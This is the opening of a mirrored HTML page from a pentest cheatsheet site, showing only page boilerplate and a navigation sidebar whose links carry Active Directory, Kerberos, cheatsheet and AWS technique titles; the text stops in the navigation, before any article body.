swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
InternalAllTheThings/redteam/persistence/windows-persistence/index.html

5381 lines
189 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

<!doctype html>
<html lang="en" class="no-js">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="description" content="Active Directory and Internal Pentest Cheatsheets">
<link rel="canonical" href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/">
<link rel="prev" href="../rdp-persistence/">
<link rel="next" href="../../pivoting/network-pivoting-techniques/">
<link rel="icon" href="../../../assets/images/favicon.png">
<meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.5.44">
<title>Windows - Persistence - Internal All The Things</title>
<link rel="stylesheet" href="../../../assets/stylesheets/main.0253249f.min.css">
<link rel="stylesheet" href="../../../assets/stylesheets/palette.06af60db.min.css">
<style>
.social-container {
float: right;
}
</style>
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
<style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
<link rel="stylesheet" href="../../../custom.css">
<script>__md_scope=new URL("../../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
<meta property="og:type" content="website" >
<meta property="og:title" content="Windows - Persistence - Internal All The Things" >
<meta property="og:description" content="Active Directory and Internal Pentest Cheatsheets" >
<meta property="og:image" content="https://swisskyrepo.github.io/InternalAllTheThings/assets/images/social/redteam/persistence/windows-persistence.png" >
<meta property="og:image:type" content="image/png" >
<meta property="og:image:width" content="1200" >
<meta property="og:image:height" content="630" >
<meta property="og:url" content="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/" >
<meta name="twitter:card" content="summary_large_image" >
<meta name="twitter:title" content="Windows - Persistence - Internal All The Things" >
<meta name="twitter:description" content="Active Directory and Internal Pentest Cheatsheets" >
<meta name="twitter:image" content="https://swisskyrepo.github.io/InternalAllTheThings/assets/images/social/redteam/persistence/windows-persistence.png" >
</head>
<body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
<input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
<input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
<label class="md-overlay" for="__drawer"></label>
<div data-md-component="skip">
<a href="#windows-persistence" class="md-skip">
Skip to content
</a>
</div>
<div data-md-component="announce">
</div>
<header class="md-header md-header--shadow" data-md-component="header">
<nav class="md-header__inner md-grid" aria-label="Header">
<a href="../../.." title="Internal All The Things" class="md-header__button md-logo" aria-label="Internal All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
<label class="md-header__button md-icon" for="__drawer">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
</label>
<div class="md-header__title" data-md-component="header-title">
<div class="md-header__ellipsis">
<div class="md-header__topic">
<span class="md-ellipsis">
Internal All The Things
</span>
</div>
<div class="md-header__topic" data-md-component="header-topic">
<span class="md-ellipsis">
Windows - Persistence
</span>
</div>
</div>
</div>
<form class="md-header__option" data-md-component="palette">
<input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
<label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
<input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
<label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
</form>
<script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
<label class="md-header__button md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
</label>
<div class="md-search" data-md-component="search" role="dialog">
<label class="md-search__overlay" for="__search"></label>
<div class="md-search__inner" role="search">
<form class="md-search__form" name="search">
<input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
<label class="md-search__icon md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
</label>
<nav class="md-search__options" aria-label="Search">
<a href="javascript:void(0)" class="md-search__icon md-icon" title="Share" aria-label="Share" data-clipboard data-clipboard-text="" data-md-component="search-share" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M18 16.08c-.76 0-1.44.3-1.96.77L8.91 12.7c.05-.23.09-.46.09-.7s-.04-.47-.09-.7l7.05-4.11c.54.5 1.25.81 2.04.81a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3c0 .24.04.47.09.7L8.04 9.81C7.5 9.31 6.79 9 6 9a3 3 0 0 0-3 3 3 3 0 0 0 3 3c.79 0 1.5-.31 2.04-.81l7.12 4.15c-.05.21-.08.43-.08.66 0 1.61 1.31 2.91 2.92 2.91s2.92-1.3 2.92-2.91A2.92 2.92 0 0 0 18 16.08"/></svg>
</a>
<button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
</button>
</nav>
<div class="md-search__suggest" data-md-component="search-suggest"></div>
</form>
<div class="md-search__output">
<div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
<div class="md-search-result" data-md-component="search-result">
<div class="md-search-result__meta">
Initializing search
</div>
<ol class="md-search-result__list" role="presentation"></ol>
</div>
</div>
</div>
</div>
</div>
<div class="md-header__source">
<a href="https://github.com/swisskyrepo/InternalAllTheThings" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
</nav>
</header>
<div class="md-container" data-md-component="container">
<main class="md-main" data-md-component="main">
<div class="md-main__inner md-grid">
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
<label class="md-nav__title" for="__drawer">
<a href="../../.." title="Internal All The Things" class="md-nav__button md-logo" aria-label="Internal All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
Internal All The Things
</label>
<div class="md-nav__source">
<a href="https://github.com/swisskyrepo/InternalAllTheThings" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../.." class="md-nav__link">
<span class="md-ellipsis">
Internal All The Things
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" >
<label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="0">
<span class="md-ellipsis">
Active directory
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_2">
<span class="md-nav__icon md-icon"></span>
Active directory
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adcs-certificate-services/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Certificate Services
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-acl-ace/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Access Controls ACL/ACE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-enumerate/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-group-policy-objects/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Group Policy Objects
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-groups/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Groups
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-linux/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Linux
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-machineaccountquota/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Machine Account Quota
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-ntds-dumping/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - NTDS Dumping
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-rodc/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Read Only Domain Controller
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adfs-federation-services/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Federation Services
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-integrated-dns/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Integrated DNS - ADIDNS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-roasting-asrep/" class="md-nav__link">
<span class="md-ellipsis">
Roasting - ASREP Roasting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-roasting-kerberoasting/" class="md-nav__link">
<span class="md-ellipsis">
Roasting - Kerberoasting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-roasting-timeroasting/" class="md-nav__link">
<span class="md-ellipsis">
Roasting - Timeroasting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-tricks/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Tricks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/deployment-sccm/" class="md-nav__link">
<span class="md-ellipsis">
Deployment - SCCM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/deployment-wsus/" class="md-nav__link">
<span class="md-ellipsis">
Deployment - WSUS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/hash-capture/" class="md-nav__link">
<span class="md-ellipsis">
Hash - Capture and Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/hash-over-pass-the-hash/" class="md-nav__link">
<span class="md-ellipsis">
Hash - OverPass-the-Hash
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/hash-pass-the-hash/" class="md-nav__link">
<span class="md-ellipsis">
Hash - Pass the Hash
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/hash-pass-the-key/" class="md-nav__link">
<span class="md-ellipsis">
Hash - Pass The Key
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/internal-dcom/" class="md-nav__link">
<span class="md-ellipsis">
Internal - DCOM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/internal-mitm-relay/" class="md-nav__link">
<span class="md-ellipsis">
Internal - MITM and Relay
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/internal-pxe-boot-image/" class="md-nav__link">
<span class="md-ellipsis">
Internal - PXE Boot Image
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/internal-shares/" class="md-nav__link">
<span class="md-ellipsis">
Internal - Shares
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/kerberos-bronze-bit/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos - Bronze Bit
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/kerberos-delegation-constrained/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos Delegation - Constrained Delegation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/kerberos-delegation-rbcd/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos Delegation - Resource Based Constrained Delegation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/kerberos-delegation-unconstrained/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos Delegation - Unconstrained Delegation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/kerberos-s4u/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos - Service for User Extension
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/kerberos-tickets/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos - Tickets
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-comments/" class="md-nav__link">
<span class="md-ellipsis">
Password - AD User Comment
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-dsrm-credentials/" class="md-nav__link">
<span class="md-ellipsis">
Password - DSRM Credentials
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-group-policy-preferences/" class="md-nav__link">
<span class="md-ellipsis">
Password - Group Policy Preferences
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-precreated-computer/" class="md-nav__link">
<span class="md-ellipsis">
Password - Pre-Created Computer Account
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-read-gmsa/" class="md-nav__link">
<span class="md-ellipsis">
Password - GMSA
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-read-laps/" class="md-nav__link">
<span class="md-ellipsis">
Password - LAPS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-shadow-credentials/" class="md-nav__link">
<span class="md-ellipsis">
Password - Shadow Credentials
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-spraying/" class="md-nav__link">
<span class="md-ellipsis">
Password - Spraying
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/trust-pam/" class="md-nav__link">
<span class="md-ellipsis">
Trust - Privileged Access Management
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/trust-relationship/" class="md-nav__link">
<span class="md-ellipsis">
Trust - Relationship
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/trust-sid-hijacking/" class="md-nav__link">
<span class="md-ellipsis">
Child Domain to Forest Compromise - SID Hijacking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/trust-ticket/" class="md-nav__link">
<span class="md-ellipsis">
Forest to Forest Compromise - Trust Ticket
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2_44" >
<label class="md-nav__link" for="__nav_2_44" id="__nav_2_44_label" tabindex="0">
<span class="md-ellipsis">
CVE
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_2_44_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_2_44">
<span class="md-nav__icon md-icon"></span>
CVE
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../active-directory/CVE/MS14-068/" class="md-nav__link">
<span class="md-ellipsis">
MS14-068 Checksum Validation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/CVE/NoPAC/" class="md-nav__link">
<span class="md-ellipsis">
NoPAC / samAccountName Spoofing
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/CVE/PrintNightmare/" class="md-nav__link">
<span class="md-ellipsis">
PrintNightmare
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/CVE/PrivExchange/" class="md-nav__link">
<span class="md-ellipsis">
PrivExchange
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/CVE/ZeroLogon/" class="md-nav__link">
<span class="md-ellipsis">
ZeroLogon
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
<label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
<span class="md-ellipsis">
Cheatsheets
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_3">
<span class="md-nav__icon md-icon"></span>
Cheatsheets
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../cheatsheets/escape-breakout/" class="md-nav__link">
<span class="md-ellipsis">
Kiosk Escape and Jail Breakout
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/hash-cracking/" class="md-nav__link">
<span class="md-ellipsis">
Hash Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/mimikatz-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Mimikatz
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/miscellaneous-tricks/" class="md-nav__link">
<span class="md-ellipsis">
Miscellaneous &amp; Tricks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/network-discovery/" class="md-nav__link">
<span class="md-ellipsis">
Network Discovery
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/powershell-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Powershell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/shell-bind-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Bind Shell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/shell-reverse-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Reverse Shell Cheat Sheet
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/source-code-management-ci/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Management &amp; CI/CD Compromise
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
<span class="md-ellipsis">
Cloud
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4">
<span class="md-nav__icon md-icon"></span>
Cloud
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_1" >
<label class="md-nav__link" for="__nav_4_1" id="__nav_4_1_label" tabindex="0">
<span class="md-ellipsis">
Aws
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_1_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4_1">
<span class="md-nav__icon md-icon"></span>
Aws
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-access-token/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Access Token &amp; Secrets
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-cli/" class="md-nav__link">
<span class="md-ellipsis">
AWS - CLI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-cognito/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - Cognito
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-dynamodb/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - DynamoDB
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-ec2/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - EC2
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-enumeration/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Enumerate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-iam/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Identity &amp; Access Management
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-ioc-detection/" class="md-nav__link">
<span class="md-ellipsis">
AWS - IOC &amp; Detections
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cloud/aws/aws-lambda/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - Lambda &amp; API Gateway
</span>
</a>
</li>
<li class="md-nav__item">
